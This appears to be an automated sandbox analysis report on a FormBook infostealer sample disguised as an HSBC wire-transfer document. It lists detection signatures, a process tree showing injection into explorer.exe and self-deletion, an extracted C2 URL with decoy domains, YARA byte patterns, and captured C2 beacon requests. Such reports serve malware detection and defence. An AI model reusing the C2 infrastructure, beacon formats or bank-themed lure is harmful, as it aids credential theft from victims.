Windows Analysis Report HSBC ... Wire Transfer Copy.exe

Overview

General Information

Sample Name: HSBC ... Wire Transfer Copy.exe
Analysis ID: 528773
MD5: 99b154970d15748d1df9025f675ecc76
SHA1: 75503611daf18643a401c2020ae9e045111b7f1f
SHA256: 13af03cd2db9c68bc397fd81f101287df005f27bc806737ffad390324a068d4c
Tags: exe, Formbook, HSBC

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • HSBC ... Wire Transfer Copy.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: 99B154970D15748D1DF9025F675ECC76)
    • HSBC ... Wire Transfer Copy.exe (PID: 7164 cmdline: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe MD5: 99B154970D15748D1DF9025F675ECC76)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6672 cmdline: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.atlantiscompania.com/m4n8/"], "decoy": ["loganvineyard.com", "seanna-charters.com", "ironbandfitness.com", "centuriesandsleuthsreviews.com", "saminicky2022.com", "oscarlorenzo.online", "donaldlittlelaw.com", "internetbook.net", "dailyhealthyfood.com", "kostarelosdair.com", "baodingtangyang.com", "cumberlndfarms.com", "dylanmellor.xyz", "investwithelsa.com", "dermaaesthetika.com", "shoelife864.com", "nightcosex.biz", "greauxbooks.com", "artwithnumber.com", "hyggestudio.store", "vektor-pro.com", "bookextraevents.com", "poweredsky.store", "carver150.com", "greenfleetshippingco.com", "raise-ryokwpl.xyz", "lobbiru.com", "tilcep.xyz", "frist-universe.com", "thehumanityleague.com", "zz4321.com", "rightpowereletricalservices.com", "alainasdesigns.com", "getcardanocoin.com", "wattnow.biz", "nitromaxfmx.com", "rty161578.top", "danielthan.com", "devjmccormick.com", "clearwaterwaverunners.com", "onlineames.com", "pureproducts.xyz", "yoothdirect.info", "tryprovo.com", "mkuu88888.xyz", "fibers2you.com", "urdnauha.xyz", "andfme.com", "shopkoman.com", "civico46bcn.com", "top-online-fashion-24.com", "lakshimechatronicssystems.com", "cortezphoto.com", "samallondemolitonyorkshire.com", "uang.exchange", "gonderipaylasim.net", "piramsgprodiet.store", "parasmountplus.com", "sifangav.net", "gramaltinrafineri.com", "kvb5676.com", "atomhome.xyz", "catproductreviews.com", "frenchieaday.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: HSBC ... Wire Transfer Copy.exe, Virustotal: Detection: 16%
          Source: HSBC ... Wire Transfer Copy.exe, ReversingLabs: Detection: 40%
          Yara detected FormBook
          Source: Yara match, File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: HSBC ... Wire Transfer Copy.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HSBC ... Wire Transfer Copy.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe, Code function: 4x nop then pop edi, 6_2_0040E477
          Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then pop edi, 16_2_02C6E477

          Networking:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 172.217.168.83 80
          Source: C:\Windows\explorer.exe, Domain query: www.gramaltinrafineri.com
          Source: C:\Windows\explorer.exe, Domain query: www.catproductreviews.com
          Source: C:\Windows\explorer.exe, Domain query: www.piramsgprodiet.store
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.atlantiscompania.com/m4n8/
          Source: global traffic, HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNHyAaYYkpUFqoPlzKT8wvvxP2/AQv7fSiFC9KSL+ HTTP/1.1 Host: www.piramsgprodiet.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /m4n8/?5jblCF=6FC/YAdxArGDbOG0ZU8ranLB3olQ8/HIU17UMwKJ54PfoS0z6/xA4+VoDBKhLnDEQ6+k&l0G=-Zrd9J1pqHLdHPo HTTP/1.1 Host: www.gramaltinrafineri.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=fqwcloTwW+H6Usea82LuZckhsM6vXxH+7LRp9WPFBQLwjEJmVheIZ7PCXY+dS9vifeb6 HTTP/1.1 Host: www.catproductreviews.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 25 Nov 2021 17:58:23 GMT Content-Type: text/html Content-Length: 275 ETag: "61973ffe-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 25 Nov 2021 17:58:43 GMT Content-Type: text/html Content-Length: 275 ETag: "61973ffe-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ipconfig.exe, 00000010.00000002.551598331.000000000403F000.00000004.00020000.sdmp, String found in binary or memory: https://www.piramsgprodiet.store/m4n8/?l0G=-Zrd9J1pqHLdHPo&5jblCF=tUrd37IHNwUNrKy1BA5QR6EUYG6BNH
          Source: unknown, DNS traffic detected: queries for: www.piramsgprodiet.store

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: HSBC ... Wire Transfer Copy.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
